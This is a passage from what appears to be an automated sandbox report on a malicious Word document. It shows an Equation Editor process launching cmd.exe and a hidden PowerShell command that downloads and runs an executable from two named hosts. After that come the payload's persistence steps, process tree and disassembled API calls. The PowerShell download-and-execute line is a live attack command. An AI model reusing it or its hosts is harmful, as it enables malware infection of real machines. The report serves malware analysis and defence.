IRP_MJ_SET_EA	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_SYSTEM_CONTROL	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_QUERY_SECURITY	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_SET_QUOTA	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_QUERY_INFORMATION	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_SHUTDOWN	\FileSystem\MRxDAV	81F451DE	new

New Device

Driver	Device	Attached to (upper)	Attached to (lower)
\FileSystem\MRxDAV		unknown	unknown

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3580 Parent PID: 2956

General

Start time:	16:03:24
Start date:	25/05/2018
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\FORMP16T.docx
Imagebase:	0x2f2b0000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: FLTLDR.EXE PID: 3852 Parent PID: 3580

General

Start time:	16:03:38
Start date:	25/05/2018
Path:	C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\JPEGIM32.FLT
Imagebase:	0x2d2c0000
File size:	120160 bytes
MD5 hash:	92E7D4655C629754D2366E67E68A32F9
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 3888 Parent PID: 536

General

Start time:	16:03:39
Start date:	25/05/2018
Path:	C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3912 Parent PID: 3888

General

Start time:	16:03:39
Start date:	25/05/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	CmD /C %tmp%\task.bat & UUUUUUUU c
Imagebase:	0x4a580000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 3968 Parent PID: 3912

General

Start time:	16:03:41
Start date:	25/05/2018
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Imagebase:	0x21ab0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: ounehcnaykuL.exe PID: 236 Parent PID: 3968

General

Start time:	16:04:26
Start date:	25/05/2018
Path:	C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Imagebase:	0x400000
File size:	270387 bytes
MD5 hash:	A5EB363D44116B6CECB2AA7527FD7A6A
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: ounehcnaykuL.exe PID: 2780 Parent PID: 236

General

Start time:	16:05:24
Start date:	25/05/2018
Path:	C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Imagebase:	0x400000
File size:	270387 bytes
MD5 hash:	A5EB363D44116B6CECB2AA7527FD7A6A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: ounehcnaykuM.exe PID: 2760 Parent PID: 2780

General

Start time:	16:05:25
Start date:	25/05/2018
Path:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Imagebase:	0x400000
File size:	270387 bytes
MD5 hash:	A5EB363D44116B6CECB2AA7527FD7A6A
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: ounehcnaykuM.exe PID: 2992 Parent PID: 2760

General

Start time:	16:06:22
Start date:	25/05/2018
Path:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Imagebase:	0x400000
File size:	270387 bytes
MD5 hash:	A5EB363D44116B6CECB2AA7527FD7A6A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskeng.exe PID: 2068 Parent PID: 836

General

Start time:	16:07:00
Start date:	25/05/2018
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {4FF6B578-0DC8-43D6-96ED-9BD735AC3890} S-1-5-18:NT AUTHORITY\System:Service:
Imagebase:	0xda0000
File size:	192000 bytes
MD5 hash:	4F2659160AFCCA990305816946F69407
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ounehcnaykuM.exe PID: 2532 Parent PID: 2068

General

Start time:	16:07:00
Start date:	25/05/2018
Path:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Imagebase:	0x400000
File size:	270387 bytes
MD5 hash:	A5EB363D44116B6CECB2AA7527FD7A6A
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: ounehcnaykuM.exe PID: 3060 Parent PID: 2532

General

Start time:	16:08:31
Start date:	25/05/2018
Path:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Imagebase:	0x400000
File size:	270387 bytes
MD5 hash:	A5EB363D44116B6CECB2AA7527FD7A6A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 3144 Parent PID: 3060

General

Start time:	16:09:04
Start date:	25/05/2018
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	svchost.exe
Imagebase:	0xee0000
File size:	20992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ounehcnaykuM.exe PID: 2992 Parent PID: 2760

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	31.2%
Total number of Nodes:	64
Total number of Limit Nodes:	1

Executed Functions

Function 001EFE30, Relevance: 25.2, APIs: 12, Strings: 2, Instructions: 661
sleep

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001E3EB0: ??2@YAPAXI@Z.MSVCRT ref: 001E3EB7
Part of subcall function 001E3EB0: memset.MSVCRT ref: 001E3ECD

Sleep.KERNELBASE(00000001), ref: 001EFE80
SetCurrentDirectoryW.KERNELBASE(?), ref: 001EFEF3
srand.MSVCRT ref: 001EFF04

Part of subcall function 001EEDA0: LoadLibraryW.KERNEL32(?), ref: 001EEDF2
Part of subcall function 001EEDA0: LoadLibraryW.KERNEL32(?), ref: 001EEE19
Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEE47
Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEE6F
Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEE97
Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEEBF
Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEEE7

Part of subcall function 001EBC10: CoInitializeEx.OLE32(00000000,00000000), ref: 001EBC14
Part of subcall function 001EBC10: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 001EBC33

GetCurrentProcess.KERNEL32(?), ref: 001EFF44
IsWow64Process.KERNELBASE(00000000), ref: 001EFF4B
??2@YAPAXI@Z.MSVCRT ref: 001EFF74

Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E6386
Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E639E
Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E64AC
Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E64B2
Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E64B8
Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E64F9
Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E6517
Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E6538
Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E660F
Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E6618
Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E661E

??3@YAXPAX@Z.MSVCRT ref: 001EFFB1

Part of subcall function 001E1B70: memset.MSVCRT ref: 001E1BA3
Part of subcall function 001E1B70: memset.MSVCRT ref: 001E1BB2
Part of subcall function 001E1B70: ??2@YAPAXI@Z.MSVCRT ref: 001E1BC9
Part of subcall function 001E1B70: ??2@YAPAXI@Z.MSVCRT ref: 001E1BE8

??2@YAPAXI@Z.MSVCRT ref: 001F0004

Part of subcall function 001E1F50: memcpy.MSVCRT ref: 001E1FEC

Part of subcall function 001E6A70: ??2@YAPAXI@Z.MSVCRT ref: 001E6A86
Part of subcall function 001E6A70: ??2@YAPAXI@Z.MSVCRT ref: 001E6AA1
Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6BB0
Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6BDE
Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6C48
Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6CA1

Part of subcall function 001EFAD0: ??3@YAXPAX@Z.MSVCRT ref: 001EFB8D
Part of subcall function 001EFAD0: ??3@YAXPAX@Z.MSVCRT ref: 001EFBA4

Part of subcall function 001E5780: ??2@YAPAXI@Z.MSVCRT ref: 001E57D5
Part of subcall function 001E5780: ??3@YAXPAX@Z.MSVCRT ref: 001E582F

_time64.MSVCRT ref: 001F014D

Part of subcall function 001EDA20: ??2@YAPAXI@Z.MSVCRT ref: 001EDA7A
Part of subcall function 001EDA20: ??3@YAXPAX@Z.MSVCRT ref: 001EDAB9
Part of subcall function 001EDA20: _time64.MSVCRT ref: 001EDADB
Part of subcall function 001EDA20: ??3@YAXPAX@Z.MSVCRT ref: 001EDB0B

Part of subcall function 001F1D50: ??2@YAPAXI@Z.MSVCRT ref: 001F1D7F
Part of subcall function 001F1D50: ??3@YAXPAX@Z.MSVCRT ref: 001F1DBE
Part of subcall function 001F1D50: _time64.MSVCRT ref: 001F1DE0
Part of subcall function 001F1D50: ??3@YAXPAX@Z.MSVCRT ref: 001F1E0D

_time64.MSVCRT ref: 001F04B4

Part of subcall function 001EC980: _itow.MSVCRT ref: 001EC999

Part of subcall function 001EADB0: ??3@YAXPAX@Z.MSVCRT ref: 001EADEF
Part of subcall function 001EADB0: ??3@YAXPAX@Z.MSVCRT ref: 001EAF9A

Part of subcall function 001F14C0: WSAStartup.WS2_32(00000202,?), ref: 001F14E2
Part of subcall function 001F14C0: gethostname.WS2_32(?,000000FF), ref: 001F1502
Part of subcall function 001F14C0: getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 001F1522
Part of subcall function 001F14C0: freeaddrinfo.WS2_32(00000000), ref: 001F1580
Part of subcall function 001F14C0: WSACleanup.WS2_32 ref: 001F1586

Part of subcall function 001E5A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001F00C1), ref: 001E5B3F

_time64.MSVCRT ref: 001F0338

Part of subcall function 001E37C0: memcpy.MSVCRT ref: 001E3CA0

Part of subcall function 001E2030: ??2@YAPAXI@Z.MSVCRT ref: 001E207A
Part of subcall function 001E2030: ??3@YAXPAX@Z.MSVCRT ref: 001E2176
Part of subcall function 001E2030: _time64.MSVCRT ref: 001E21A8
Part of subcall function 001E2030: ??3@YAXPAX@Z.MSVCRT ref: 001E21CF

Part of subcall function 001E9AB0: WSAStartup.WS2_32(00000202,?), ref: 001E9ADA
Part of subcall function 001E9AB0: freeaddrinfo.WS2_32(00000000,001F043A), ref: 001E9B3B
Part of subcall function 001E9AB0: getaddrinfo.WS2_32(001F043A,00000000,?,00000000), ref: 001E9BD6
Part of subcall function 001E9AB0: freeaddrinfo.WS2_32(00000000), ref: 001E9C1E
Part of subcall function 001E9AB0: WSACleanup.WS2_32 ref: 001E9C44

Part of subcall function 001F2AD0: ??2@YAPAXI@Z.MSVCRT ref: 001F2ADD
Part of subcall function 001F2AD0: ??3@YAXPAX@Z.MSVCRT ref: 001F2B54
Part of subcall function 001F2AD0: _time64.MSVCRT ref: 001F2B82
Part of subcall function 001F2AD0: ??3@YAXPAX@Z.MSVCRT ref: 001F2BAA

Part of subcall function 001EEAC0: CoCreateInstance.OLE32(001F708C,00000000,00000001,001F6E7C,00000004,001F8880,000003E7,001EFF87), ref: 001EEB17

Part of subcall function 001F2BC0: ??2@YAPAXI@Z.MSVCRT ref: 001F2C56
Part of subcall function 001F2BC0: ??2@YAPAXI@Z.MSVCRT ref: 001F2C90
Part of subcall function 001F2BC0: ??2@YAPAXI@Z.MSVCRT ref: 001F2CDB
Part of subcall function 001F2BC0: ??3@YAXPAX@Z.MSVCRT ref: 001F2D75
Part of subcall function 001F2BC0: ??3@YAXPAX@Z.MSVCRT ref: 001F2D8A
Part of subcall function 001F2BC0: ??3@YAXPAX@Z.MSVCRT ref: 001F2D9E

ExitProcess.KERNEL32 ref: 001F0706

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

Part of subcall function 001E35E0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00000000,00000000,001F8880,000003E7), ref: 001E3622
Part of subcall function 001E35E0: CreateMutexW.KERNELBASE(?,00000001,?), ref: 001E366B
Part of subcall function 001E35E0: ExitProcess.KERNEL32 ref: 001E368E

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Part of subcall function 001E95A0: FreeLibrary.KERNELBASE(00000000,001F0700), ref: 001E95D1

Strings

D, xrefs: 001F061D
p9?, xrefs: 001EFE60, 001EFE75, 001EFE87, 001EFEB9, 001EFECD, 001EFEE1, 001EFEF5, 001EFFB9, 001F00C1, 001F0134, 001F01B0, 001F0215, 001F054A, 001F0601, 001F0695, 001F06AC, 001F06CC, 001F06DE

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EEDA0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197
library

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?), ref: 001EEDF2
LoadLibraryW.KERNEL32(?), ref: 001EEE19
GetProcAddress.KERNEL32(00000000,?), ref: 001EEE47
GetProcAddress.KERNEL32(00000000,?), ref: 001EEE6F
GetProcAddress.KERNEL32(00000000,?), ref: 001EEE97
GetProcAddress.KERNEL32(00000000,?), ref: 001EEEBF
GetProcAddress.KERNEL32(00000000,?), ref: 001EEEE7
GetProcAddress.KERNEL32(00000000,?), ref: 001EEF0F
GetProcAddress.KERNEL32(00000000,?), ref: 001EEF37
GetProcAddress.KERNEL32(00000000,?), ref: 001EEF5B
GetProcAddress.KERNEL32(00000000,?), ref: 001EEF7F
GetProcAddress.KERNEL32(00000000,?), ref: 001EEFA3

Strings

p9?, xrefs: 001EEDA3, 001EEFC8, 001EEFE1

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F1F60, Relevance: 12.1, APIs: 8, Instructions: 98
library

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 001F1F87
GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
GetProcessHeap.KERNEL32 ref: 001F2015
RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 00415D50, Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 505
librarynative

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,00000040), ref: 00415E06
LoadLibraryA.KERNEL32(00000000), ref: 00416118
GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,00000004,?,00000040), ref: 00416173
GetProcAddress.KERNEL32(00000000,00000002,00000000,00000000,?,?,?,?,?,00000004,?,00000040), ref: 0041619B
NtQueryInformationProcess.NTDLL(?,00000000,00000000,00000018,00000000), ref: 0041634A

Strings

, xrefs: 00416240

Memory Dump Source

Source File: 00000012.00000002.10396226677.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_ounehcnaykuM.jbxd

Function 001F3130, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(001E81FD,00000000,?,00000010,00000000,00000000), ref: 001F3192

Strings

SeTakeOwnershipPrivilege, xrefs: 001F3149
p9?, xrefs: 001F3133, 001F3176, 001F3198

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E6E00, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85

APIs

GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 001E6E5D

Strings

p9?, xrefs: 001E6E06, 001E6E48, 001E6E63, 001E6E8E, 001E6EA6, 001E6EBC

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EEAC0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33com

APIs

CoCreateInstance.OLE32(001F708C,00000000,00000001,001F6E7C,00000004,001F8880,000003E7,001EFF87), ref: 001EEB17

Strings

p9?, xrefs: 001EEAE5, 001EEAFC

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E9640, Relevance: 1.5, APIs: 1, Instructions: 4

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000BC7B), ref: 001E9645

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E3E30, Relevance: 16.9, APIs: 11, Instructions: 368

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001E5C50: LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 001E5CDB
Part of subcall function 001E5C50: memcpy.MSVCRT ref: 001E5D81
Part of subcall function 001E5C50: memcpy.MSVCRT ref: 001E5DA6
Part of subcall function 001E5C50: _time64.MSVCRT ref: 001E5E4C
Part of subcall function 001E5C50: _localtime64.MSVCRT ref: 001E5E5D
Part of subcall function 001E5C50: wcsftime.MSVCRT ref: 001E5E87

VariantInit.OLEAUT32(?), ref: 001E6386
VariantInit.OLEAUT32(?), ref: 001E639E

Part of subcall function 001F24C0: SysAllocString.OLEAUT32(001E63CA), ref: 001F24D3

Part of subcall function 001E13A0: ??2@YAPAXI@Z.MSVCRT ref: 001E13A9
Part of subcall function 001E13A0: SysAllocString.OLEAUT32(75CF3F3F), ref: 001E13CA

Part of subcall function 001E7CF0: InterlockedDecrement.KERNEL32(?), ref: 001E7CFE
Part of subcall function 001E7CF0: SysFreeString.OLEAUT32(00000000), ref: 001E7D13
Part of subcall function 001E7CF0: ??_V@YAXPAX@Z.MSVCRT ref: 001E7D21
Part of subcall function 001E7CF0: ??3@YAXPAX@Z.MSVCRT ref: 001E7D2A

VariantClear.OLEAUT32(?), ref: 001E64AC
VariantClear.OLEAUT32(?), ref: 001E64B2
VariantClear.OLEAUT32(?), ref: 001E64B8
VariantInit.OLEAUT32(?), ref: 001E64F9
VariantInit.OLEAUT32(?), ref: 001E6517
VariantInit.OLEAUT32(?), ref: 001E6538
VariantClear.OLEAUT32(?), ref: 001E660F
VariantClear.OLEAUT32(?), ref: 001E6618
VariantClear.OLEAUT32(?), ref: 001E661E

Part of subcall function 001E6E00: GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 001E6E5D

Part of subcall function 001F27B0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000001,?,?,80000001,?,001E6342,?,?,?,?,001EFF94), ref: 001F282F

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Part of subcall function 001E33A0: VariantClear.OLEAUT32(?), ref: 001E3432
Part of subcall function 001E33A0: SysFreeString.OLEAUT32(001E632B), ref: 001E345C
Part of subcall function 001E33A0: SysFreeString.OLEAUT32(?), ref: 001E34D6
Part of subcall function 001E33A0: VariantClear.OLEAUT32(?), ref: 001E3575
Part of subcall function 001E33A0: SysFreeString.OLEAUT32(?), ref: 001E359B

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001ED796, Relevance: 15.1, APIs: 10, Instructions: 135
sleep

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001E71D1: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001E7208
Part of subcall function 001E71D1: GetCurrentProcessId.KERNEL32 ref: 001E7214
Part of subcall function 001E71D1: GetCurrentThreadId.KERNEL32 ref: 001E721C
Part of subcall function 001E71D1: GetTickCount.KERNEL32 ref: 001E7224
Part of subcall function 001E71D1: QueryPerformanceCounter.KERNEL32(?), ref: 001E7230

GetStartupInfoW.KERNEL32(?,001F71B0,0000005C), ref: 001F358E
InterlockedCompareExchange.KERNEL32(001F8880,?,00000000), ref: 001F35B6
Sleep.KERNEL32(000003E8), ref: 001F35D1
_amsg_exit.MSVCRT ref: 001F35E7
__initterm_e.LIBCMT ref: 001F3608
_initterm.MSVCRT ref: 001F3631
InterlockedExchange.KERNEL32(001F8880,00000000), ref: 001F3649

Part of subcall function 001EFE30: Sleep.KERNELBASE(00000001), ref: 001EFE80
Part of subcall function 001EFE30: SetCurrentDirectoryW.KERNELBASE(?), ref: 001EFEF3
Part of subcall function 001EFE30: srand.MSVCRT ref: 001EFF04
Part of subcall function 001EFE30: GetCurrentProcess.KERNEL32(?), ref: 001EFF44
Part of subcall function 001EFE30: IsWow64Process.KERNELBASE(00000000), ref: 001EFF4B
Part of subcall function 001EFE30: ??2@YAPAXI@Z.MSVCRT ref: 001EFF74
Part of subcall function 001EFE30: ??3@YAXPAX@Z.MSVCRT ref: 001EFFB1
Part of subcall function 001EFE30: ??2@YAPAXI@Z.MSVCRT ref: 001F0004
Part of subcall function 001EFE30: _time64.MSVCRT ref: 001F014D
Part of subcall function 001EFE30: _time64.MSVCRT ref: 001F0338
Part of subcall function 001EFE30: _time64.MSVCRT ref: 001F04B4
Part of subcall function 001EFE30: ExitProcess.KERNEL32 ref: 001F0706

exit.MSVCRT ref: 001F36D4
_cexit.MSVCRT ref: 001F3727

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E5C50, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 313

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 001E5CDB
memcpy.MSVCRT ref: 001E5D81
memcpy.MSVCRT ref: 001E5DA6

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
